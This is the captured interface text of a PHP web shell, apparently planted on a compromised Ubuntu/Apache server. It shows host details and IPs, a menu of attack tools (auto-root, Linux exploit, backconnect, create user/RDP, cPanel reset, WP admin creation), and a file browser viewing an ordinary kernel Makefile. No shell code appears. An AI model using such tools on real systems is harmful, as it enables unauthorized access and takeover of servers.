Linux localhost 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 23.92.16.63 | : 162.159.119.54
Cant Read [ /etc/named.conf ]
8.1.5
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
src /
linux-headers-5.4.0-198 /
drivers /
misc /
mic /
[ HOME SHELL ]
Name
Size
Permission
Action
bus
[ DIR ]
drwxr-xr-x
card
[ DIR ]
drwxr-xr-x
cosm
[ DIR ]
drwxr-xr-x
cosm_client
[ DIR ]
drwxr-xr-x
host
[ DIR ]
drwxr-xr-x
scif
[ DIR ]
drwxr-xr-x
vop
[ DIR ]
drwxr-xr-x
Kconfig
5.46
KB
-rw-r--r--
Makefile
331
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Makefile
# SPDX-License-Identifier: GPL-2.0 # # Makefile - Intel MIC Linux driver. # Copyright(c) 2013, Intel Corporation. # obj-$(CONFIG_INTEL_MIC_HOST) += host/ obj-$(CONFIG_INTEL_MIC_CARD) += card/ obj-y += bus/ obj-$(CONFIG_SCIF) += scif/ obj-$(CONFIG_MIC_COSM) += cosm/ obj-$(CONFIG_MIC_COSM) += cosm_client/ obj-$(CONFIG_VOP) += vop/
Close